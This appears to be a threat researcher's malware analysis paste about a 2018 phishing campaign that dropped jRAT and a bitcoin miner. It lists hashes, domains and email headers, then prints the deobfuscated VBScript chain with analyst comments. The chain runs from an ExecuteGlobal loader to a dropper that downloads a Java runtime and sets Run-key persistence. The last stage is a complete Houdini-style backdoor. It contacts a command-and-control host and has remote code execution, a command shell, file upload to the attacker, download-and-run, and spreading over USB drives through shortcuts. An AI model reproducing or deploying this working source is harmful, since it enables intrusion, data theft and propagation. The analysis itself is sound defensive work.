- #phishing email drops a bitcoin miner and jrat out of a .IMG file with a .VBS inside
- more info @neonprimetime
- https://neonprimetime.blogspot.com/2018/11/jrat-and-bitcoin-miner-from-img-vbs-phish.html
- ------
- VT links
- ------
- https://www.virustotal.com/#/file/f2bd54981d86e7d475164ca5725090232dc1efd5251c42b58292d8b51e506aa2/community
- https://www.virustotal.com/#/file/370784be22039af009a0b4e7915e36c4899133ac3afbb659cbbbec03dc9a2c6e/community
- https://www.virustotal.com/#/file/07e13a645058b0f0afe4e79a34abf08dbead97c50b41cb9593035af13250e0f1/community
- https://www.virustotal.com/#/file/b0cf01550e576a21ff62f1c34dbe202b14b73b0465cdf7558c445f09eee3a6c1/community
- https://www.virustotal.com/#/file/5dcd1a584e27f75870b2c95aac56523927377d8c693fe6fc8a3f422cac79cadc/community
- https://www.virustotal.com/#/file/77ecb4b190368eacf09103247fdd75c0c30a6b3c3340acb3d15df7747178cabc/community
- ----
- app anyrun
- ----
- https://app.any.run/tasks/77449da4-d60e-4c45-922c-b4a85c7ef814
- -----
- dns
- -----
- welcomehome.duckdns.org [173.46.85.98]
- fud.fudcrypt.com
- ----
- md5 hashes
- ----
- f3a99bcd752bff6a15154484c94cdc21
- f3c67b1a2631fde05b24ab26ce5bf6ea
- b93df40c82b94680218ea964b5ce6808 ( THOR APT scanner says #magickitten #jrat #MiddleEasternThreatGroups )
- 11d828c9301a36749174b1e0459cba55
- d859b188405930541aea64ad22f8cf92
- 7443f9ecbd050b1e7eae529983543b05
- ------
- email headers
- ------
- X-Env-Sender: dbittnerf@gmail.com
- x-originating-ip: [162.144.196.83]
- Received: from server.ineli-mena.org (HELO server.ineli-mena.org)
- From: "Purchase Assistance" <dbittnerf@gmail.com>
- Subject: RE: B&G EQUIPMENT PO# 102571
- Date: Mon, 5 Nov 2018
- ---------------
- vbscript
- ---------------
- ' Analyst notes: first-stage loader. The decode chain visible below is:
- '   linen(.., radio = 0, ..) replaces the "#(" marker in the embedded string with "m" and
- '   base64-decodes it through a Microsoft.XMLDOM element typed "bin.base64";
- '   hen(.., 4, ..) turns those bytes into us-ascii text with the shared ADODB.Stream;
- '   table(..) hands the resulting text to ExecuteGlobal.
- ' The embedded payload string is redacted ("[REMOVED]") in this paste.
- ' Most parameters of these routines are never read; they appear to be padding.
- ' Hunting: a script host instantiating ADODB.Stream and Microsoft.XMLDOM and then calling ExecuteGlobal.
- Set noun = CreateObject("ADODB.Stream")
- ' hen: bytes -> text. Only acts when omo = 4; water is the byte array, alafia is unused.
- Private Function hen(water, omo, alafia)
- If omo = 4 Then
- noun.Type = 1
- noun.Open
- noun.Write water
- noun.Position = 0
- noun.Type = 2
- noun.CharSet = "us-ascii"
- hen = noun.ReadText
- End If
- End Function
- ' bas_6_4_2_bin: base64 text (kili) -> byte array. The other five parameters are unused.
- Private Function bas_6_4_2_bin(kintu, kinpo, kili, manj, aaro, sport)
- Set ms_lmx_dfa = CreateObject("Microsoft.XMLDOM")
- Set ms_pmt_dfa = ms_lmx_dfa.createElement("tmp")
- ms_pmt_dfa.DataType = "bin.base64"
- ms_pmt_dfa.Text = kili
- bas_6_4_2_bin = ms_pmt_dfa.NodeTypedValue
- End Function
- ' table: executes the text in naira in global scope. The single-pass loop changes nothing.
- Private Sub table(chair, milo, sound, clef, sule, naira)
- For i = 0 To 0
- ExecuteGlobal naira
- Next
- End Sub
- ' linen: radio = 0 returns the decoded bytes of the embedded blob; any other value returns ladela unchanged.
- Private Function linen(stove, gard, radio, ladela)
- Dim m_u_t_e_x, the_const, m_a_i_n, pau_sed
- ' "#(" stands in for one character so the embedded string is not valid base64 until Replace runs
- m_u_t_e_x = "#("
- the_const = "m"
- m_a_i_n = "[REMOVED]"
- pau_sed = ""
- If radio = 0 Then
- pau_sed = Replace(m_a_i_n, m_u_t_e_x, the_const)
- linen = bas_6_4_2_bin(Nothing, 1, pau_sed, 10, 87, False)
- Else
- 'table "7", False, 10, ladela, Nothing, 10
- linen = ladela
- End If
- End Function
- Dim kilimanjaro
- ' inner linen(.., 0, ..) decodes; hen converts to text; outer linen(.., 1, ..) is a pass-through
- kilimanjaro = linen(0, Nothing, 1, hen(linen(0, Nothing, 0, 284), 4, Nothing))
- ' only the last argument matters: the decoded script text is executed here
- table "2", Nothing, False, True, 0, kilimanjaro
- Set noun = Nothing
- ---------------
- decoded binary
- ---------------
- ' Analyst notes: second-stage dropper (top-level statements). It writes two embedded, base64-encoded
- ' payloads (redacted as "[REMOVED]" in this paste) under %appdata% and starts both:
- '   %appdata%\VRMedabkRb.vbs  - run directly through WScript.Shell
- '   %appdata%\ntfsmgr.jar     - run with javaw.exe and persisted under the HKCU Run value "ntfsmgr"
- ' decodeBase64, writeBytes, getValidJre and GrabJreFromNet are defined further down in the same script.
- ' Hunting: the two file names above, the Run value "ntfsmgr", and wscript spawning javaw.exe -jar.
- Const TypeBinary = 1
- Const ForReading = 1, ForWriting = 2, ForAppending = 8
- Dim longText1
- longText1 = "[REMOVED]"
- Set wshShell1 = CreateObject("WScript.Shell")
- Dim appdatadir1, stubpath1
- appdatadir1 = wshShell1.ExpandEnvironmentStrings("%appdata%")
- stubpath1 = appdatadir1 & "\VRMedabkRb.vbs"
- Dim decoded1
- decoded1 = decodeBase64(longText1)
- writeBytes stubpath1, decoded1
- ' launches the dropped .vbs; the path is wrapped in double quotes
- wshShell1.Run("""" & stubpath1 & """")
- Set wshShell1 = Nothing
- Dim longText
- longText = "[REMOVED]"
- ' same "#(" placeholder trick as the loader stage, here restored to "A" before decoding
- longText = Replace(longText, "#(", "A")
- Set wshShell = CreateObject( "WScript.Shell" )
- Dim tempdir, appdatadir, text, stubpath
- tempdir = wshShell.ExpandEnvironmentStrings("%temp%")
- appdatadir = wshShell.ExpandEnvironmentStrings("%appdata%")
- stubpath = appdatadir & "\ntfsmgr.jar"
- Dim decoded
- decoded = decodeBase64(longText)
- writeBytes stubpath, decoded
- Set fso = CreateObject("Scripting.FileSystemObject")
- ' from here on, failed registry reads do not stop the script
- On Error Resume Next
- ' look for an installed Java runtime: the Wow6432Node JavaSoft key first, then the native key
- text = wshShell.RegRead("HKLM\SOFTWARE\Wow6432Node\JavaSoft\Java Runtime Environment\CurrentVersion")
- text = wshShell.RegRead("HKLM\SOFTWARE\Wow6432Node\JavaSoft\Java Runtime Environment\" & text & "\JavaHome")
- If text = "" Then
- text = wshShell.RegRead("HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\CurrentVersion")
- text = wshShell.RegRead("HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\" & text & "\JavaHome")
- If text <> "" Then
- text = text & "\bin\javaw.exe"
- End If
- Else
- text = text & "\bin\javaw.exe"
- End If
- ' a usable runtime is only assumed when the resolved path contains "jre"
- If InStr(text, "jre") > 0 Then
- Dim validJrePath
- validJrePath = getValidJre(text)
- If InStr(validJrePath, "javaw.exe") > 0 Then
- ' persistence: HKCU Run value "ntfsmgr" = "<javaw.exe>" -jar "<%appdata%\ntfsmgr.jar>"
- wshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntfsmgr", """" & validJrePath & """ -jar """ & stubpath & """", "REG_SZ"
- wshShell.Run("""" & validJrePath & """" & " -jar " & """" & stubpath & """")
- Else
- GrabJreFromNet()
- End If
- Else
- ' no local Java found: fall back to downloading a runtime
- GrabJreFromNet()
- End If
- ' GrabJreFromNet: fallback used when no suitable local Java runtime was found.
- ' Fetches jre.zip over plain HTTP (synchronous GET), saves it as %appdata%\jre.zip, extracts it to
- ' %appdata%\jre7, registers that folder as Java 1.7 under the HKLM JavaSoft key, writes the HKCU Run
- ' value "ntfsmgr" and starts the jar. Relies on the script-level appdatadir, stubpath and wshShell.
- ' Hunting: a script host fetching jre.zip, a jre7 folder under %appdata%, a JavaHome value pointing into a user profile.
- Private Sub GrabJreFromNet()
- Dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
- Dim bStrm: Set bStrm = createobject("Adodb.Stream")
- xHttp.Open "GET", "http://www.thegoldfingerinc.com/images/jre.zip", False
- xHttp.Send
- with bStrm
- ' type 1 = binary stream; savetofile option 2 overwrites an existing file
- .type = 1
- .open
- .write xHttp.responseBody
- .savetofile appdatadir & "\jre.zip", 2
- end with
- UnZip appdatadir & "\jre.zip", appdatadir & "\jre7"
- ' machine-wide Java registration is pointed at the extracted copy
- wshShell.RegWrite "HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\CurrentVersion", "1.7", "REG_SZ"
- wshShell.RegWrite "HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\1.7\JavaHome", appdatadir & "\jre7", "REG_SZ"
- ' same Run value name as the local-Java path, but with the downloaded javaw.exe
- wshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntfsmgr", """" & appdatadir & "\jre7\bin\javaw.exe"" -jar " & """" & stubpath & """", "REG_SZ"
- wshShell.Run("""" & appdatadir & "\jre7\bin\javaw.exe"" -jar " & """" & stubpath & """")
- End Sub
- ' decodeBase64: returns the bytes encoded by the base64 string argument.
- ' Uses a throwaway Microsoft.XMLDOM element with DataType "bin.base64" as the decoder,
- ' the same technique as bas_6_4_2_bin in the loader stage.
- Private Function decodeBase64(base64)
- Dim DM, EL
- Set DM = CreateObject("Microsoft.XMLDOM")
- Set EL = DM.createElement("tmp")
- EL.DataType = "bin.base64"
- EL.Text = base64
- decodeBase64 = EL.NodeTypedValue
- End Function
- ' writeBytes: writes a byte array to the path in file through a binary ADODB.Stream.
- ' TypeBinary (1) and ForWriting (2) are the constants declared at the top of this script;
- ' 2 as the SaveToFile option overwrites an existing file.
- Private Sub writeBytes(file, bytes)
- Dim binaryStream
- Set binaryStream = CreateObject("ADODB.Stream")
- binaryStream.Type = TypeBinary
- binaryStream.Open
- binaryStream.Write bytes
- binaryStream.SaveToFile file, ForWriting
- End Sub
- ' UnZip: extracts zipfile into the folder ExtractTo using the Windows shell (Shell.Application).
- ' Does nothing unless the extension is exactly "zip". Creates the target folder when missing and
- ' deletes a same-named file in the target before copying each top-level archive item.
- ' Uses the script-level fso object.
- Sub UnZip(zipfile, ExtractTo)
- if fso.GetExtensionName(zipfile) = "zip" then
- If NOT fso.FolderExists(ExtractTo) Then
- fso.CreateFolder(ExtractTo)
- End If
- set objShell = CreateObject("Shell.Application")
- set destination = objShell.NameSpace(ExtractTo)
- set zip_content = objShell.NameSpace(zipfile).Items
- for i = 0 to zip_content.count - 1
- if (fso.FileExists(fso.Buildpath(ExtractTo,zip_content.item(i).name)+"."+fso.getExtensionName(zip_content.item(i).path))) then
- fso.DeleteFile(fso.Buildpath(ExtractTo,zip_content.item(i).name)+"."+fso.getExtensionName(zip_content.item(i).path))
- end if
- ' CopyHere option 20 = 4 + 16: no progress dialog, answer "Yes to All" to prompts
- destination.copyHere zip_content.item(i), 20
- next
- End if
- End Sub
- ' getValidJre: returns the first javaw.exe path from res (one candidate per CRLF-separated line)
- ' whose "-version" output mentions 1.6, 1.7 or 1.8; returns nothing when none qualifies.
- ' Each candidate is run hidden through cmd /c (window style 0, wait for exit) with stderr redirected
- ' to %temp%\output.txt, which is then read back. Uses the script-level wshShell, fso and tempdir.
- ' Hunting: cmd.exe spawned by a script host with a javaw.exe -version command line, and %temp%\output.txt.
- Function getValidJre(res)
- a = Split(res, vbCrLf)
- for each x in a
- if InStr(x, "javaw.exe") > 0 Then
- Return = wshShell.Run("cmd /c " & """" & x & """" & " -version 2> %temp%\output.txt", 0, true)
- Set file = fso.OpenTextFile(tempdir & "\output.txt", 1)
- text = file.ReadAll
- file.Close
- If InStr(text, "1.6") > 0 Or InStr(text, "1.7") > 0 Or InStr(text, "1.8") > 0 Then
- getValidJre = x
- Exit Function
- End If
- End If
- next
- End Function
- Set wshShell = Nothing
- ------
- nested vbscript
- ------
- ' Analyst notes: nested loader, structurally identical to the first-stage loader on this page.
- ' The only visible difference is the_const: the "#(" marker is replaced with "A" here.
- ' Decode chain: linen(.., radio = 0, ..) restores and base64-decodes the embedded string via
- ' Microsoft.XMLDOM ("bin.base64"); hen(.., 4, ..) converts the bytes to us-ascii text with the
- ' shared ADODB.Stream; table(..) passes the text to ExecuteGlobal.
- ' The embedded payload string is redacted ("[REMOVED]") in this paste.
- Set noun = CreateObject("ADODB.Stream")
- ' hen: bytes -> text. Only acts when omo = 4; alafia is unused.
- Private Function hen(water, omo, alafia)
- If omo = 4 Then
- noun.Type = 1
- noun.Open
- noun.Write water
- noun.Position = 0
- noun.Type = 2
- noun.CharSet = "us-ascii"
- hen = noun.ReadText
- End If
- End Function
- ' bas_6_4_2_bin: base64 text (kili) -> byte array. The other five parameters are unused.
- Private Function bas_6_4_2_bin(kintu, kinpo, kili, manj, aaro, sport)
- Set ms_lmx_dfa = CreateObject("Microsoft.XMLDOM")
- Set ms_pmt_dfa = ms_lmx_dfa.createElement("tmp")
- ms_pmt_dfa.DataType = "bin.base64"
- ms_pmt_dfa.Text = kili
- bas_6_4_2_bin = ms_pmt_dfa.NodeTypedValue
- End Function
- ' table: executes the text in naira in global scope. The single-pass loop changes nothing.
- Private Sub table(chair, milo, sound, clef, sule, naira)
- For i = 0 To 0
- ExecuteGlobal naira
- Next
- End Sub
- ' linen: radio = 0 returns the decoded bytes of the embedded blob; any other value returns ladela unchanged.
- Private Function linen(stove, gard, radio, ladela)
- Dim m_u_t_e_x, the_const, m_a_i_n, pau_sed
- m_u_t_e_x = "#("
- the_const = "A"
- m_a_i_n = "[REMOVED]"
- pau_sed = ""
- If radio = 0 Then
- pau_sed = Replace(m_a_i_n, m_u_t_e_x, the_const)
- linen = bas_6_4_2_bin(Nothing, 1, pau_sed, 10, 87, False)
- Else
- 'table "7", False, 10, ladela, Nothing, 10
- linen = ladela
- End If
- End Function
- Dim kilimanjaro
- ' inner linen(.., 0, ..) decodes; hen converts to text; outer linen(.., 1, ..) is a pass-through
- kilimanjaro = linen(0, Nothing, 1, hen(linen(0, Nothing, 0, 284), 4, Nothing))
- ' only the last argument matters: the decoded script text is executed here
- table "2", Nothing, False, True, 0, kilimanjaro
- Set noun = Nothing
- -----
- 3rd nested script decoded
- -----
- ' Analyst notes: third-stage VBScript backdoor; the banner on the next line is part of the sample.
- ' Behaviour visible in this section: the script polls host:port over plain HTTP (see post), splits
- ' each reply on the "<|>" separator and dispatches on the first field. Two of the handlers
- ' ("excecute" and "sleep") evaluate server-supplied text as VBScript.
- ' Hunting: periodic POSTs to /is-ready on the configured port (default interval 5000 ms),
- ' and the command tokens below appearing in HTTP responses.
- '<[ recoder : houdini (c) skype : houdini-fx ]>
- '=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- ' the two commented-out lines are an alternate host/port left in the sample
- 'host = "pm2bitcoin.com"
- 'port = 3175
- host = "fud.fudcrypt.com"
- port = 7755
- installdir = "%appdata%"
- ' lnkfile / lnkfolder switch the shortcut creation in install on or off
- lnkfile = true
- lnkfolder = true
- '=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
- dim shellobj
- set shellobj = wscript.createobject("wscript.shell")
- dim filesystemobj
- set filesystemobj = createobject("scripting.filesystemobject")
- dim httpobj
- set httpobj = createobject("msxml2.xmlhttp")
- '=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
- installname = wscript.scriptname
- startup = shellobj.specialfolders ("startup") & "\"
- installdir = shellobj.expandenvironmentstrings(installdir) & "\"
- ' falls back to %temp% when the configured install folder does not exist
- if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
- ' field separator used in both requests and replies: <|>
- spliter = "<" & "|" & ">"
- ' polling interval in milliseconds; the "sleep" command can change it
- sleep = 5000
- dim response
- dim cmd
- dim param
- info = ""
- usbspreading = ""
- startdate = ""
- dim oneonce
- '=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
- on error resume next
- instance
- ' main loop: re-run install, poll the server, act on the reply, wait, repeat
- while true
- install
- response = ""
- response = post ("is-ready","")
- cmd = split (response,spliter)
- select case cmd (0)
- ' runs the second field as VBScript statements
- case "excecute"
- param = cmd (1)
- execute param
- ' replaces the installed script file with the second field and relaunches it
- case "update"
- param = cmd (1)
- oneonce.close
- set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
- oneonce.write param
- oneonce.close
- shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
- wscript.quit
- case "uninstall"
- uninstall
- case "send"
- download cmd (1),cmd (2)
- case "site-send"
- sitedownloader cmd (1),cmd (2)
- case "recv"
- param = cmd (1)
- upload (param)
- case "enum-driver"
- post "is-enum-driver",enumdriver
- case "enum-faf"
- param = cmd (1)
- post "is-enum-faf",enumfaf (param)
- case "enum-process"
- post "is-enum-process",enumprocess
- case "cmd-shell"
- param = cmd (1)
- post "is-cmd-shell",cmdshell (param)
- case "delete"
- param = cmd (1)
- deletefaf (param)
- case "exit-process"
- param = cmd (1)
- exitprocess (param)
- ' the new interval is passed through eval, so the field is evaluated as an expression
- case "sleep"
- param = cmd (1)
- sleep = eval (param)
- end select
- wscript.sleep sleep
- wend
- ' install: called on every pass of the main loop. Re-applies persistence through upstart, then
- ' handles removable media: for each ready drive with free space and drivetype = 1 (removable) it
- ' copies the running script to the drive root and marks the copy hidden + system (attributes 2+4).
- ' When lnkfile / lnkfolder are true, every non-.lnk file and every top-level folder on the drive is
- ' marked hidden + system as well, and a same-named .lnk is created whose target is cmd.exe with
- ' arguments that start the script copy and then open the original item.
- ' Hunting: .lnk files in the root of removable drives with target cmd.exe and arguments beginning
- ' "/c start", next to hidden + system originals and a hidden script file.
- sub install
- on error resume next
- dim lnkobj
- dim filename
- dim foldername
- dim fileicon
- dim foldericon
- upstart
- for each drive in filesystemobj.drives
- if drive.isready = true then
- if drive.freespace > 0 then
- if drive.drivetype = 1 then
- filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
- if filesystemobj.fileexists (drive.path & "\" & installname) then
- filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4
- end if
- for each file in filesystemobj.getfolder( drive.path & "\" ).Files
- if not lnkfile then exit for
- if instr (file.name,".") then
- ' existing shortcuts are left alone; everything else is hidden
- if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
- file.attributes = 2+4
- if ucase (file.name) <> ucase (installname) then
- filename = split(file.name,".")
- set lnkobj = shellobj.createshortcut (drive.path & "\" & filename (0) & ".lnk")
- ' window style 7 = minimized
- lnkobj.windowstyle = 7
- lnkobj.targetpath = "cmd.exe"
- lnkobj.workingdirectory = ""
- lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
- ' the shortcut borrows the registered icon for the file's extension, or the file itself
- fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
- if instr (fileicon,",") = 0 then
- lnkobj.iconlocation = file.path
- else
- lnkobj.iconlocation = fileicon
- end if
- lnkobj.save()
- end if
- end if
- end if
- next
- for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
- if not lnkfolder then exit for
- folder.attributes = 2+4
- foldername = folder.name
- set lnkobj = shellobj.createshortcut (drive.path & "\" & foldername & ".lnk")
- lnkobj.windowstyle = 7
- lnkobj.targetpath = "cmd.exe"
- lnkobj.workingdirectory = ""
- lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
- foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
- if instr (foldericon,",") = 0 then
- lnkobj.iconlocation = folder.path
- else
- lnkobj.iconlocation = foldericon
- end if
- lnkobj.save()
- next
- end If
- end If
- end if
- next
- err.clear
- end sub
- ' uninstall: handler for the "uninstall" command. Deletes the HKCU and HKLM Run values named after
- ' the script, the Startup-folder copy and the running script, then walks ready removable drives
- ' (drivetype = 1): clears attributes on files and folders, deletes the .lnk files and the script
- ' copy, and finally exits the script host.
- ' Forensic note: this routine does not touch the HKLM\software\<script base name>\ value written
- ' by instance, so that marker can remain after self-removal.
- sub uninstall
- on error resume next
- dim filename
- dim foldername
- shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
- shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
- filesystemobj.deletefile startup & installname ,true
- filesystemobj.deletefile wscript.scriptfullname ,true
- for each drive in filesystemobj.drives
- if drive.isready = true then
- if drive.freespace > 0 then
- if drive.drivetype = 1 then
- for each file in filesystemobj.getfolder ( drive.path & "\").files
- on error resume next
- if instr (file.name,".") then
- if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
- ' attributes = 0 makes the original file visible again
- file.attributes = 0
- if ucase (file.name) <> ucase (installname) then
- filename = split(file.name,".")
- filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
- else
- filesystemobj.deletefile (drive.path & "\" & file.name)
- end If
- else
- ' every .lnk in the drive root is deleted, not only the ones this script created
- filesystemobj.deletefile (file.path)
- end if
- end if
- next
- for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
- folder.attributes = 0
- next
- end if
- end if
- end if
- next
- wscript.quit
- end sub
- ' post: sends one synchronous HTTP POST to http://<host>:<port>/<cmd> with param as the body and
- ' returns the response text. The host profile string built by information is sent in a request
- ' header on every call; the header name is given here as "user-agent:".
- ' Hunting: unencrypted POSTs whose header value contains "<|>"-separated host details.
- function post (cmd ,param)
- post = param
- httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
- httpobj.setrequestheader "user-agent:",information
- httpobj.send param
- post = httpobj.responsetext
- end function
- ' information: builds the host profile string sent with every request. Fields, joined by spliter:
- ' hwid (volume serial), %computername%, %username%, OS caption from win32_operatingsystem,
- ' the literal "plus", the security string (antivirus product names) and the usbspreading marker.
- function information
- on error resume next
- if inf = "" then
- inf = hwid & spliter
- inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter
- inf = inf & shellobj.expandenvironmentstrings("%username%") & spliter
- set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- set os = root.execquery ("select * from win32_operatingsystem")
- ' only the first result row is used
- for each osinfo in os
- inf = inf & osinfo.caption & spliter
- exit for
- next
- inf = inf & "plus" & spliter
- inf = inf & security & spliter
- inf = inf & usbspreading
- information = inf
- else
- information = inf
- end if
- end function
- ' upstart: persistence. Writes a Run value named after the script's base name under both HKCU and
- ' HKLM with the data  wscript.exe //B "<installdir><installname>"  and copies the running script
- ' to installdir and to the user's Startup folder. Called from instance and from install, so the
- ' entries are rewritten on every pass of the main loop.
- ' Hunting: Run values launching wscript.exe //B with a script path under %appdata% or %temp%,
- ' and a script file with the same name in the Startup folder.
- sub upstart ()
- on error resume Next
- shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
- shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
- filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
- filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
- end sub
- ' hwid: returns the volume serial number of the first win32_logicaldisk entry that has one.
- ' Used by information as the first field of the host profile (a per-host identifier).
- function hwid
- on error resume next
- set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- set disks = root.execquery ("select * from win32_logicaldisk")
- for each disk in disks
- if disk.volumeserialnumber <> "" then
- hwid = disk.volumeserialnumber
- exit for
- end if
- next
- end function
- ' security: returns the display names of registered antivirus products, each followed by " .",
- ' or the literal "nan-av" when none are returned. The names are read from the antivirusproduct
- ' class in root\securitycenter or root\securitycenter2, chosen from the parsed OS version.
- ' The result is reported to the server as part of the information string.
- ' Hunting: a script host querying the securitycenter / securitycenter2 WMI namespaces.
- function security
- on error resume next
- security = ""
- set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- ' flag 48 = return immediately + forward-only enumerator
- set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
- for each objitem in colitems
- versionstr = split (objitem.version,".")
- next
- versionstr = split (colitems.version,".")
- osversion = versionstr (0) & "."
- for x = 1 to ubound (versionstr)
- osversion = osversion & versionstr (i)
- next
- osversion = eval (osversion)
- if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
- set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
- Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
- for each objantivirus in colantivirus
- security = security & objantivirus.displayname & " ."
- next
- if security = "" then security = "nan-av"
- end function
- ' instance: start-up routine, run once before the main loop.
- ' 1. Reads the default value of HKLM\software\<script base name>\ into usbspreading. When empty,
- '    writes "true - <date>" if the script is running from a drive root (path after the drive letter
- '    equals ":\<installname>") and "false - <date>" otherwise. The value is later reported to the server.
- ' 2. Calls upstart (persistence).
- ' 3. If the running file is not the installed copy, launches the installed copy and exits.
- ' 4. Opens the installed script for appending and keeps the handle in oneonce; exits if that fails.
- '    NOTE(review): this looks like a single-instance guard - confirm.
- ' Forensic value: the registry marker records the date of first execution and whether it started from a drive root.
- function instance
- on error resume next
- usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
- if usbspreading = "" then
- if lcase ( mid(wscript.scriptfullname,2)) = ":\" & lcase(installname) then
- usbspreading = "true - " & date
- shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
- else
- usbspreading = "false - " & date
- shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
- end if
- end If
- upstart
- set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname)
- set installfullnameshort = filesystemobj.getfile (installdir & installname)
- ' short (8.3) paths are compared so the two spellings of the same file match
- if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
- shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
- wscript.quit
- end If
- err.clear
- ' mode 8 = open for appending
- set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
- if err.number > 0 then wscript.quit
- end function
- ' sitedownloader: handler for the "site-send" command. Fetches fileurl with a synchronous HTTP GET,
- ' saves the body as <installdir><filename> (replacing any existing file) when the status is 200,
- ' and then runs the saved file by its short path.
- ' Hunting: a script host downloading a file into %appdata% / %temp% and immediately executing it.
- sub sitedownloader (fileurl,filename)
- strlink = fileurl
- strsaveto = installdir & filename
- set objhttpdownload = createobject("msxml2.xmlhttp" )
- objhttpdownload.open "get", strlink, false
- objhttpdownload.send
- set objfsodownload = createobject ("scripting.filesystemobject")
- if objfsodownload.fileexists (strsaveto) then
- objfsodownload.deletefile (strsaveto)
- end if
- if objhttpdownload.status = 200 then
- dim objstreamdownload
- set objstreamdownload = createobject("adodb.stream")
- with objstreamdownload
- ' type 1 = binary stream
- .type = 1
- .open
- .write objhttpdownload.responsebody
- .savetofile strsaveto
- .close
- end with
- set objstreamdownload = nothing
- end if
- if objfsodownload.fileexists(strsaveto) then
- shellobj.run objfsodownload.getfile (strsaveto).shortpath
- end if
- end sub
- ' download: handler for the "send" command. Requests a file from the configured server with a POST
- ' to /is-sending<|><fileurl>, saves the body under filedir (installdir when empty) using the part
- ' of fileurl after the last backslash as the file name, and then runs the saved file.
- ' Hunting: POST requests whose path starts with "is-sending" followed by the "<|>" separator.
- sub download (fileurl,filedir)
- if filedir = "" then
- filedir = installdir
- end if
- strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
- set objhttpdownload = createobject("msxml2.xmlhttp")
- objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
- objhttpdownload.send ""
- set objfsodownload = createobject ("scripting.filesystemobject")
- if objfsodownload.fileexists (strsaveto) then
- objfsodownload.deletefile (strsaveto)
- end if
- if objhttpdownload.status = 200 then
- dim objstreamdownload
- set objstreamdownload = createobject("adodb.stream")
- with objstreamdownload
- ' type 1 = binary stream
- .type = 1
- .open
- .write objhttpdownload.responsebody
- .savetofile strsaveto
- .close
- end with
- set objstreamdownload = nothing
- end if
- if objfsodownload.fileexists(strsaveto) then
- shellobj.run objfsodownload.getfile (strsaveto).shortpath
- end if
- end sub
- ' upload: handler for the "recv" command. Reads the local file named by fileurl as binary and
- ' sends its contents to the configured server in a POST to /is-recving<|><fileurl>.
- ' This is the file-exfiltration path; the full local path appears in the request URL.
- ' Hunting: POST requests whose path starts with "is-recving" followed by the "<|>" separator.
- function upload (fileurl)
- dim httpobj,objstreamuploade,buffer
- set objstreamuploade = createobject("adodb.stream")
- with objstreamuploade
- .type = 1
- .open
- .loadfromfile fileurl
- buffer = .read
- .close
- end with
- set objstreamdownload = nothing
- set httpobj = createobject("msxml2.xmlhttp")
- httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
- httpobj.send buffer
- end function
- ' enumdriver: handler for "enum-driver". Returns one "<path>|<drivetype>" entry per ready drive,
- ' each followed by the "<|>" separator; the caller posts the result to /is-enum-driver.
- function enumdriver ()
- for each drive in filesystemobj.drives
- if drive.isready = true then
